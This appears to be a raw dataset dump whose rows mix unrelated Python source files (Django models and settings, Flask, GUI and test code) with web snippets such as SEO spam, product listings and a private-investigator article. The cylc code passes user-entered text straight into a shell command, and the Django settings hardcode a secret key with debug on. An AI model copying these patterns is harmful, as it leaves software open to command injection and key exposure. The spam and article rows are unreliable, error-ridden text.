text
stringlengths 29
850k
|
---|
# -*- coding: UTF-8 -*-
#
# Copyright 2013 Leandro Regueiro
#
# This file is part of Thesaurus-editor.
#
# Thesaurus-editor is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# Thesaurus-editor is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# Thesaurus-editor. If not, see <http://www.gnu.org/licenses/>.
from django.db import models
#class Language(models.Model):
# iso_code = models.CharField(primary_key=True, max_length=10)
# name = models.CharField(max_length=50)
#
# def __unicode__(self):
# return u"%(iso_code)s" % self.iso_code
#class Thesaurus(models.Model):
# name = models.CharField(primary_key=True, max_length=50)
# language = models.ForeignKey(Language, null=True, on_delete=models.SET_NULL)
#
# def __unicode__(self):
# return self.name
class Word(models.Model):
word = models.CharField(primary_key=True, max_length=100)
finalized = models.BooleanField(default=False)
#thesaurus = models.ForeignKey(Thesaurus)
class Meta:
ordering = ['word']
#unique_together = ("word", "thesaurus")#TODO in case of uncommenting this, remove primary_key=True from word field.
def __unicode__(self):
return self.word
def _retrieve_list(self, relationship_type):
relationship_list = []
for relationship in self.relationship_set.filter(relationship_type=relationship_type):
#TODO export the relationship objects too, since it is neccessary for getting the part of speech.
#TODO export the relationship intermediary table, since it is neccessary for getting the notes.
relationship_list.append({"pk": relationship.pk,
"pos": relationship.pos,
"words": relationship.words.exclude(word=self)})
return relationship_list
def retrieve_synonyms(self):
return self._retrieve_list("S")
def retrieve_antonyms(self):
return self._retrieve_list("A")
def retrieve_hypernyms(self):
return self._retrieve_list("H")
#def next_word(self):
# return
class Relationship(models.Model):
RELATIONSHIP_CHOICES = (
(u'S', u'Synonym'),
(u'A', u'Antonym'),
(u'H', u'Hypernym'),
)
relationship_type = models.CharField(max_length=2, choices=RELATIONSHIP_CHOICES)
words = models.ManyToManyField(Word, through='WordsForRelationship')
pos = models.CharField(max_length=20, null=True, blank=True, default="")# Part of speech
def __unicode__(self):
return u"%(type)s: %(words)s" % {"type": self.get_relationship_type_display(), "words": self.words.all()}
class WordsForRelationship(models.Model):
relationship = models.ForeignKey(Relationship)
word = models.ForeignKey(Word)
note = models.CharField(max_length=20, null=True, blank=True, default="")# Like (generic word) or something like that
class Meta:
unique_together = ("relationship", "word")
def __unicode__(self):
return u"%(word)s --> %(relationship)s" % {"word": self.word, "relationship": self.relationship}
|
Here at True Concrete Siding, we're there to fulfill your standards for Concrete Siding in Canaan, VT. Our crew of highly trained contractors will give you the services you'll need with the most sophisticated solutions around. We make certain that you receive the very best services, the best selling price, and the best quality supplies. Call by dialing 888-603-5512 to start out.
Here at True Concrete Siding, we know that you want to stay within budget and cut costs anywhere you are able to. You'll still need to have quality work for Concrete Siding in Canaan, VT, and you're able to rely on our team to help you save money while continuing with giving the top quality work. Our initiatives to help you save money will never compromise on the high quality of our results. Our objective is to ensure that you enjoy the best supplies and a result which endures through the years. It will be feasible given that we know the way to save your time and funds on products and labor. Save your time and money by simply getting in touch with True Concrete Siding now. We're waiting to take your phone call at 888-603-5512.
Concrete Siding are available in Canaan, VT.
When you're thinking of Concrete Siding in Canaan, VT, you need to be well informed to make the best choices. You should not enter into it without knowing it properly, and you should understand what you should expect. You won't encounter any kind of unexpected surprises whenever you deal with True Concrete Siding. Start off by dialing 888-603-5512 to talk about your job. We are going to reply to all of your important questions and arrange the first meeting. We will work with you all through the whole project, and our crew is going to show up on time and prepared.
Lots of good reasons exist to decide on True Concrete Siding for Concrete Siding in Canaan, VT. We'll be the first choice when you require the most beneficial cash saving options, the finest equipment, and the best rank of customer satisfaction. Our company is available to help you with the greatest working experience and competence around. Whenever you need Concrete Siding in Canaan, contact True Concrete Siding by dialing 888-603-5512, and we'll be pleased to help. |
"""
mm_app_core.py
~~~~~~~~~~~~
This module supports accessing image acquisition functionality, similar to the
main Micro-Manager dialog.
:copyright: (c) 2012 by Albert Boehmler
:license: GNU Affero General Public License, see LICENSE for more details.
"""
import sys, os, time, thread
from flask import Blueprint, render_template, abort, url_for, redirect, request
from pylab import imsave, cm
import MMCorePy
from settings import mm_core as mmc
import settings
import configurations
import mm_util
mm_app_core = Blueprint('mm_app_core', __name__,
template_folder='templates')
@mm_app_core.route('/')
def index():
return render_template('acquisition.html',
mm_app_core=sys.modules[__name__],
configurations=configurations._get_configs_listing())
def get_allowed_binning_values():
return mmc.getAllowedPropertyValues(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def get_available_shutters():
return mmc.getLoadedDevicesOfType(MMCorePy.ShutterDevice)
@mm_app_core.route('/binning/')
def get_binning():
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
@mm_app_core.route('/binning/', methods=['POST'])
def set_binning():
binning_value = int(request.form['binning'])
return _set_binning(binning_value)
@mm_app_core.route('/shutter/')
def get_shutter():
return mmc.getShutterDevice()
@mm_app_core.route('/exposure/')
def get_exposure():
return mmc.getExposure()
@mm_app_core.route('/exposure/', methods=['POST'])
def set_exposure():
exposure_value = float(request.form['exposure'])
return _set_exposure(exposure_value)
@mm_app_core.route('/auto-shutter/')
def get_auto_shutter():
return mmc.getAutoShutter()
@mm_app_core.route('/auto-shutter/', methods=['POST'])
def set_auto_shutter():
auto_shutter_value = mm_util.from_js_boolean(request.form['auto-shutter'])
return _set_auto_shutter(auto_shutter_value)
@mm_app_core.route('/open-shutter/')
def get_shutter_open():
return mmc.getShutterOpen()
@mm_app_core.route('/open-shutter/', methods=['POST'])
def set_shutter_open():
open_shutter_value = mm_util.from_js_boolean(request.form['open-shutter'])
return _set_shutter_open(open_shutter_value)
@mm_app_core.route('/active-shutter/')
def get_active_shutter():
return mmc.getShutter()
@mm_app_core.route('/active-shutter/', methods=['POST'])
def set_active_shutter():
active_shutter_value = str(request.form['active-shutter'])
return _set_active_shutter(active_shutter_value)
@mm_app_core.route('/snap-image/')
def snap_image():
image_name = _snap_image()
return render_template('snap-image.html',
img_url=url_for('acq.download_acquired_image',
image_name=image_name))
def _is_camera_available():
return None != mmc.getCameraDevice()
def _set_binning(binning_value):
if (_is_camera_available()):
mmc.setProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning,
binning_value)
return mmc.getProperty(mmc.getCameraDevice(),
MMCorePy.g_Keyword_Binning)
def _set_exposure(exposure_value):
mmc.setExposure(exposure_value)
return str(mmc.getExposure())
def _set_auto_shutter(auto_shutter_value):
mmc.setAutoShutter(auto_shutter_value)
return str(mmc.getAutoShutter())
def _set_shutter_open(shutter_open_value):
mmc.setShutterOpen(shutter_open_value);
return str(mmc.getShutterOpen())
def _set_active_shutter(active_shutter_value):
return mmc.setShutterDevice(active_shutter_value)
return mmc.getShutterDevice()
def _snap_image():
image_name = "acq-%s.png" % int(time.time() * 1000)
save_location = os.path.join(settings.MM_ANYWHERE_HOST_DATA_PATH,
image_name)
camera = ""
## thread.start_new_thread(_execute_snap_image, (camera, save_location))
## time.sleep(0.1)
_execute_snap_image(camera, save_location)
return image_name
def _execute_snap_image(camera, save_location):
mmc.snapImage()
mmc.waitForSystem()
img = mmc.getImage()
imsave(save_location, img, cmap = cm.gray)
|
You broke the game, -Requiem. 'C' is the letter you're looking for.
"Dead Wrong" - The Notorious B.I.G.
Where can I watch Kuzu no honkai live action?
I come from a long line of quasi-lesbian ghost killers!
I'll fix things. Gimme a sec. |
"""
Basic tests for randombytes_* functions
"""
import libnacl
import unittest
class TestRandomBytes(unittest.TestCase):
def test_randombytes_random(self):
self.assertIsInstance(libnacl.randombytes_random(), int)
def test_randombytes_uniform(self):
self.assertIsInstance(libnacl.randombytes_uniform(200), int)
freq = {libnacl.randombytes_uniform(256): 1 for _ in range(65536)}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes(self):
'copied from libsodium default/randombytes.c'
data = libnacl.randombytes(65536)
freq = {x: 1 for x in data}
self.assertEqual(256, len(freq))
self.assertTrue(all(freq.values()))
def test_randombytes_buf_deterministic(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
data = libnacl.randombytes_buf_deterministic(32, seed)
data2 = libnacl.randombytes_buf_deterministic(32, seed)
data3 = libnacl.randombytes_buf_deterministic(32, seed2)
self.assertEqual(32, len(data))
self.assertEqual(32, len(data))
self.assertEqual(32, len(data))
self.assertEqual(data, data2)
self.assertNotEqual(data, data3)
def test_crypto_kdf_keygen(self):
master_key = libnacl.crypto_kdf_keygen()
freq = {x: 1 for x in master_key}
self.assertEqual(32, len(master_key))
self.assertTrue(all(freq.values()))
def test_crypto_kdf_derive_from_key(self):
master_key = libnacl.crypto_kdf_keygen()
subkey = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey2 = libnacl.crypto_kdf_derive_from_key(16, 1, "Examples", master_key)
subkey3 = libnacl.crypto_kdf_derive_from_key(16, 2, "Examples", master_key)
self.assertEqual(16, len(subkey))
self.assertEqual(16, len(subkey2))
self.assertEqual(16, len(subkey3))
self.assertEqual(subkey, subkey2)
self.assertNotEqual(subkey, subkey3)
def test_crypto_kx_keypair(self):
pk, sk = libnacl.crypto_kx_keypair()
self.assertEqual(32, len(pk))
self.assertEqual(32, len(sk))
def test_crypto_kx_seed_keypair(self):
seed = libnacl.randombytes_buf(32)
seed2 = libnacl.randombytes_buf(32)
pk, sk = libnacl.crypto_kx_seed_keypair(seed)
pk2, sk2 = libnacl.crypto_kx_seed_keypair(seed)
pk3, sk3 = libnacl.crypto_kx_seed_keypair(seed2)
self.assertEqual(pk, pk2)
self.assertNotEqual(pk, pk3)
self.assertEqual(sk, sk2)
self.assertNotEqual(sk, sk3)
def test_crypto_kx_client_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
rx, tx, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
rx2, tx2, status = libnacl.crypto_kx_client_session_keys(client_pk, client_sk, server_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
def test_crypto_kx_server_session_keys(self):
client_pk, client_sk = libnacl.crypto_kx_keypair()
server_pk, server_sk = libnacl.crypto_kx_keypair()
rx, tx, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
rx2, tx2, status = libnacl.crypto_kx_server_session_keys(client_pk, client_sk, server_pk)
self.assertEqual(32, len(rx))
self.assertEqual(32, len(tx))
self.assertEqual(rx, rx2)
self.assertEqual(tx, tx2)
|
Widest selection of Self Military, in stock and fast shipping, the most exclusive collection of Self Military from Ebay!
4in1 Self Defense Military Grade Stun Gun Rechargeable Flashlight Hidden Dagger!
CALVIN KLEIN New WT Elegant Dress Denim Military Style Self Belt size 4 LK! |
"""
Django settings for example_project project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%sog7c%&7^pk5+v@4@2^+s$5r45wzkxe@^)9ki0ik#k+!sa8_&'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'example_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'example_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
|
Ask any random stranger if they are reasonable, and almost all will either tell you they are reasonable or at the very least will jokingly tell you they aren’t via some cliché line about how their therapist says they are. Unfortunately, I do not think any of us are as reasonable as we think we are.
© Life in Progress Ministries 2019. Allegiant theme by CPOThemes. |
import numpy as np
import hyperopt.criteria as crit
def test_ei():
rng = np.random.RandomState(123)
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 5, .25) * np.sqrt(var) + mean
v_n = [crit.EI_gaussian_empirical(mean, var, thresh, rng, 10000)
for thresh in thresholds]
v_a = [crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds]
#import matplotlib.pyplot as plt
#plt.plot(thresholds, v_n)
#plt.plot(thresholds, v_a)
#plt.show()
if not np.allclose(v_n, v_a, atol=0.03, rtol=0.03):
for t, n, a in zip(thresholds, v_n, v_a):
print t, n, a, abs(n - a), abs(n - a) / (abs(n) + abs(a))
assert 0
#mean, var, thresh, v_n, v_a)
def test_log_ei():
for mean, var in [(0, 1), (-4, 9)]:
thresholds = np.arange(-5, 30, .25) * np.sqrt(var) + mean
ei = np.asarray(
[crit.EI_gaussian(mean, var, thresh)
for thresh in thresholds])
nlei = np.asarray(
[crit.logEI_gaussian(mean, var, thresh)
for thresh in thresholds])
naive = np.log(ei)
#import matplotlib.pyplot as plt
#plt.plot(thresholds, ei, label='ei')
#plt.plot(thresholds, nlei, label='nlei')
#plt.plot(thresholds, naive, label='naive')
#plt.legend()
#plt.show()
# -- assert that they match when the threshold isn't too high
assert np.allclose(nlei, naive)
def test_log_ei_range():
assert np.all(
np.isfinite(
[crit.logEI_gaussian(0, 1, thresh)
for thresh in [-500, 0, 50, 100, 500, 5000]]))
def test_ucb():
assert np.allclose(crit.UCB(0, 1, 1), 1)
assert np.allclose(crit.UCB(0, 1, 2), 2)
assert np.allclose(crit.UCB(0, 4, 1), 2)
assert np.allclose(crit.UCB(1, 4, 1), 3)
# -- flake8
|
Floral scents have the ability to calm and add clarity to your day. And this season there is a bounty of florals, laden with peony and rose. Easy to wear and ageless, what's special about this season's line up is the woody dry down a combination that helps balance hormones, relieve anxiety, and even increase libido. My picks for the season ahead.
The latest floral scents laden with rose.
B. Balenciaga Skin, 50ml, $170. Bottega Veneta Knot Eau Florale Eau de Parfum, 50ml $165. Giorgio Armani Si Absolu de Rose, 100ml $195. Elie Saab Le Parfum Rose Couture, 30ml, $102. Diptyque Eau Rose Eau de Toilette, 50ml, $160. TOCCA, Isabel Eau De Parfum, 30ml, $124. Narciso Eau De Parfume Poudrée, $30ml, $118. |
#!/usr/bin/env python
import sys
import re
from util import *
##
## reformat lemmatizer output from different lemmatizers
## output format: lemma1 lemma2 ... one sentence per line
##
if len(sys.argv) != 2:
print "usage: lemma_reformat.py [treetagger|freeling|morce|morph] < input > output"
sys.exit(-1)
if sys.argv[1] in "treetagger freeling morce morph".split():
tagger = sys.argv[1]
else:
print "Error: unknown lemmatizer: ", sys.argv[1]
sys.exit(-1)
# POS/lemma separator
sep = "_"
if tagger == 'morce':
for paragraph in paragraphs(sys.stdin, separator=lambda x:x.strip()=="<s>", includeEmpty=False):
if paragraph.startswith("<csts>"):
continue
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
if not line.startswith("<f") or line.startswith("<d"):
continue
try:
re_word = re.search(">.*?<", line)
word = re_word.group(0)[1:-1]
re_pos = re.search("MDt.*?>.", line)
pos = re_pos.group(0)[-1]
re_lem = re.search("(<MDl.*?>)([^<]*)(<)", line)
lem = re_lem.group(2)
if lem.find("-") > 0:
lem = lem[:lem.find("-")]
if lem.find("_") > 0:
lem = lem[:lem.find("_")]
except:
print "Warning: no lemma found: %s" % line.encode("utf8", "replace")
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
elif tagger == 'morph':
while True:
line = sys.stdin.readline()
if line == '':
break
line = line.decode("utf8", "replace")
tokens = line.split()
if tokens == []:
continue
for token in tokens:
sep1 = token.find('_')
sep2 = token.find('_', sep1+1)
if sep2 < 0:
lem = token[:sep1].lower()
print "%s%s%s" % (token.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
else:
word_pos= token[:sep2]
lem = token[sep2+1:].lower()
print "%s%s%s" % (word_pos.encode("utf8", "replace"), sep, lem.encode("utf8", "replace")),
print ""
sys.stdout.flush()
else:
for paragraph in paragraphs(sys.stdin, includeEmpty=False):
for line in paragraph.split("\n"):
line = line.decode("utf8", "replace")
tokens = line.split()
if len(tokens) < 3: # skip 'other' stuff like xml markup
continue
if tagger == 'treetagger':
word, pos, lem = tokens
if lem == "<unknown>":
lem = word
else: # tagger == "freeling"
word, lem, pos = tokens[:3]
# lowercase lemma
lem = lem.lower()
print "%s%s%s%s%s" % (word.encode("utf8", "replace"), sep, pos.encode("utf8", "replace"), sep, lem.encode("utf8")),
print""
|
Would you like to link to my Santa Barbara real estate web site? By filling out information about your web site below, I will be happy to cross link with you. Please use the code below in order to create the correct link to my real estate web site, and fill in information about yours. Thanks and any and all referrals are greatly appreciated. |
#!/usr/bin/env python
# Copyright (C) 2006-2016 Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/
from essentia_test import *
import numpy
class TestEnvelope(TestCase):
def testFile(self):
filename=join(testdata.audio_dir, 'generated', 'synthesised', 'sin_pattern_decreasing.wav')
audioLeft = MonoLoader(filename=filename, downmix='left', sampleRate=44100)()
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(audioLeft)
for x in envelope:
self.assertValidNumber(x)
def testEmpty(self):
self.assertEqualVector(Envelope()([]), [])
def testZero(self):
input = [0]*100000
envelope = Envelope(sampleRate=44100, attackTime=5, releaseTime=100)(input)
self.assertEqualVector(envelope, input)
def testOne(self):
input = [-0.5]
envelope = Envelope(sampleRate=44100, attackTime=0, releaseTime=100, applyRectification=True)(input)
self.assertEqual(envelope[0], -input[0])
def testInvalidParam(self):
self.assertConfigureFails(Envelope(), { 'sampleRate': 0 })
self.assertConfigureFails(Envelope(), { 'attackTime': -10 })
self.assertConfigureFails(Envelope(), { 'releaseTime': -10 })
suite = allTests(TestEnvelope)
if __name__ == '__main__':
TextTestRunner(verbosity=2).run(suite)
|
An Investigation organization within the south of England has been inundated with new customers. This really is a result of a television program about infidelity and cheating partners. Within the program it gave a checklist of issues to appear out for in a cheating partner. Every new client that referred to as confesses that they had viewed this program and it had created them suspicious of their spouse.
This program has also had a knock on impact on the investigators. A lot more function indicates a lot more staff. Luckily for the investigation business they have an in-house coaching scheme and they were able to get by on the staff they already employed. Most reputable investigation organizations only hire operatives that have either come from a Police background or perhaps a Unique Forces background. If an individual decides to take up detective work you'll find qualifications accessible and a lot of advice across the board.
There does appear to be a mixed opinion about private detectives and private investigators within the UK. They are not as well-known as within the USA. In the USA they are a lot more concerning the culture of the country and there's a much more familiar feel about then than inside the UK. A lot of people that call a private detective agency or a private investigation agency within the UK have extremely rarely carried out so just before. There is the opinion that a private detective agency or a private investigation agency is observed as a romantic and practically futuristic service. Individuals think that agencies use many space age gadgets and do the impossible. Others believe that private detectives and investigators are above the law and are very at home breaking the law. In truth the job of a private investigator or a private detective is quite challenging function with Many Lengthy hours inside the dark along with the cold. Striving to stay inside the law but performing the best doable job. |
# GNU Enterprise Forms - wx 2.6 UI Driver - MenuItem widget
#
# Copyright 2001-2007 Free Software Foundation
#
# This file is part of GNU Enterprise
#
# GNU Enterprise is free software; you can redistribute it
# and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation; either
# version 2, or (at your option) any later version.
#
# GNU Enterprise is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public
# License along with program; see the file COPYING. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place
# - Suite 330, Boston, MA 02111-1307, USA.
#
# $Id: menuitem.py,v 1.5 2011/07/01 20:08:23 oleg Exp $
from src.gnue.forms.uidrivers.java.widgets._base import UIWidget
from src.gnue.forms.uidrivers.java.widgets._remote import MenuItem
# =============================================================================
# Wrap an UI layer around a wxMenu widget
# =============================================================================
class UIMenuItem(UIWidget):
"""
Implements a menu item object.
"""
# -------------------------------------------------------------------------
# Create a menu item widget
# -------------------------------------------------------------------------
def _create_widget_(self, event):
"""
Creates a new MenuItem widget.
"""
if event.container:
# These are the relevant parameters
#hotkey = self._gfObject.hotkey
if self._gfObject.label is not None:
# it may be (table, tree) or frame
#uiWidget = self._gfObject.getActionSource().uiWidget
#if uiWidget._type == 'UIForm':
# actionSourceWidget = uiWidget.main_window
#else:
# actionSourceWidget = uiWidget.widget
#assert actionSourceWidget
#actionSourceWidget.Bind(wx.EVT_MENU, self.__on_menu, widget)
widget = MenuItem(self,
self._gfObject.label, # label
self._uiDriver.getStaticResourceWebPath(
self._gfObject._get_icon_file(size="16x16", format="png")
) or '', # icon file name
self._gfObject.action_off is not None, # is checkbox
)
event.container.uiAddMenu(widget)
else:
widget = None
event.container.uiAddSeparator()
self.widget = widget
# -------------------------------------------------------------------------
# Events
# -------------------------------------------------------------------------
def onMenu(self, remoteWidget):
self._gfObject._event_fire()
# -------------------------------------------------------------------------
# Check/uncheck menu item
# -------------------------------------------------------------------------
def _ui_switch_on_(self):
if self.widget is not None:
self.widget.uiCheck(True)
# -------------------------------------------------------------------------
def _ui_switch_off_(self):
if self.widget is not None:
self.widget.uiCheck(False)
# -------------------------------------------------------------------------
# Enable/disable menu item
# -------------------------------------------------------------------------
def _ui_enable_(self, enabled):
if self.widget is not None:
self.widget.uiEnable(enabled)
#def getId(self):
# return self.widget.GetId()
# =============================================================================
# Configuration data
# =============================================================================
configuration = {
'baseClass': UIMenuItem,
'provides' : 'GFMenuItem',
'container': False
}
|
Originally a metalcore band known as Operation Guillotine. Their debut album White Noise peaked at number 6 on the US Alternative charts.
They went on their first headlining tour from May to June 2016. They played Lollapolooza for the first time that year. |
#!/usr/bin/env python
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2018 NIWA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import gtk
from cylc.gui.gcapture import Gcapture
from cylc.gui.warning_dialog import warning_dialog
def graph_suite_popup(reg, cmd_help, defstartc, defstopc, graph_opts,
gcapture_windows, tmpdir, template_opts,
parent_window=None):
"""Popup a dialog to allow a user to configure their suite graphing."""
try:
import xdot
except ImportError as exc:
warning_dialog(str(exc) + "\nGraphing disabled.", parent_window).warn()
return False
window = gtk.Window()
window.set_border_width(5)
window.set_title("cylc graph " + reg)
window.set_transient_for(parent_window)
window.set_type_hint(gtk.gdk.WINDOW_TYPE_HINT_DIALOG)
vbox = gtk.VBox()
label = gtk.Label("[START]: ")
start_entry = gtk.Entry()
start_entry.set_max_length(14)
if defstartc:
start_entry.set_text(str(defstartc))
ic_hbox = gtk.HBox()
ic_hbox.pack_start(label)
ic_hbox.pack_start(start_entry, True)
vbox.pack_start(ic_hbox)
label = gtk.Label("[STOP]:")
stop_entry = gtk.Entry()
stop_entry.set_max_length(14)
if defstopc:
stop_entry.set_text(str(defstopc))
fc_hbox = gtk.HBox()
fc_hbox.pack_start(label)
fc_hbox.pack_start(stop_entry, True)
vbox.pack_start(fc_hbox, True)
cancel_button = gtk.Button("_Close")
cancel_button.connect("clicked", lambda x: window.destroy())
ok_button = gtk.Button("_Graph")
ok_button.connect("clicked", lambda w: graph_suite(
reg,
start_entry.get_text(),
stop_entry.get_text(),
graph_opts, gcapture_windows,
tmpdir, template_opts, parent_window))
help_button = gtk.Button("_Help")
help_button.connect("clicked", cmd_help, '', 'graph')
hbox = gtk.HBox()
hbox.pack_start(ok_button, False)
hbox.pack_end(cancel_button, False)
hbox.pack_end(help_button, False)
vbox.pack_start(hbox)
window.add(vbox)
window.show_all()
def graph_suite(reg, start, stop, graph_opts,
gcapture_windows, tmpdir, template_opts, window=None):
"""Launch the cylc graph command with some options."""
options = graph_opts
options += ' ' + reg + ' ' + start + ' ' + stop
command = "cylc graph " + template_opts + " " + options
foo = Gcapture(command, tmpdir)
gcapture_windows.append(foo)
foo.run()
return False
|
Communication is everything! Please send us a message if you would like to share any positive or negative feedback, have any suggestions, want to become an author, want to work with us, or have any other comments. A simple hello is always welcome, too! |
import json
import pytest
from marshmallow.fields import Field, DateTime, Dict, String, Nested, List, TimeDelta
from marshmallow import Schema
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from apispec.ext.marshmallow import common
from apispec.exceptions import APISpecError
from .schemas import (
PetSchema,
AnalysisSchema,
RunSchema,
SelfReferencingSchema,
OrderedSchema,
PatternedObjectSchema,
DefaultValuesSchema,
AnalysisWithListSchema,
)
from .utils import get_schemas, get_parameters, get_responses, get_paths, build_ref
class TestDefinitionHelper:
@pytest.mark.parametrize("schema", [PetSchema, PetSchema()])
def test_can_use_schema_as_definition(self, spec, schema):
spec.components.schema("Pet", schema=schema)
definitions = get_schemas(spec)
props = definitions["Pet"]["properties"]
assert props["id"]["type"] == "integer"
assert props["name"]["type"] == "string"
def test_schema_helper_without_schema(self, spec):
spec.components.schema("Pet", {"properties": {"key": {"type": "integer"}}})
definitions = get_schemas(spec)
assert definitions["Pet"]["properties"] == {"key": {"type": "integer"}}
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize(
"schema", [AnalysisWithListSchema, AnalysisWithListSchema()]
)
def test_resolve_schema_dict_auto_reference_in_list(self, schema):
def resolver(schema):
schema_cls = common.resolve_schema_cls(schema)
return schema_cls.__name__
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
spec.components.schema("analysis", schema=schema)
spec.path(
"/test",
operations={
"get": {
"responses": {
"200": {"schema": build_ref(spec, "schema", "analysis")}
}
}
},
)
definitions = get_schemas(spec)
assert 3 == len(definitions)
assert "analysis" in definitions
assert "SampleSchema" in definitions
assert "RunSchema" in definitions
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
def test_resolve_schema_dict_auto_reference_return_none(self, schema):
def resolver(schema):
return None
spec = APISpec(
title="Test auto-reference",
version="0.1",
openapi_version="2.0",
plugins=(MarshmallowPlugin(schema_name_resolver=resolver),),
)
with pytest.raises(KeyError):
get_schemas(spec)
with pytest.raises(
APISpecError, match="Name resolver returned None for schema"
):
spec.components.schema("analysis", schema=schema)
@pytest.mark.parametrize("schema", [AnalysisSchema, AnalysisSchema()])
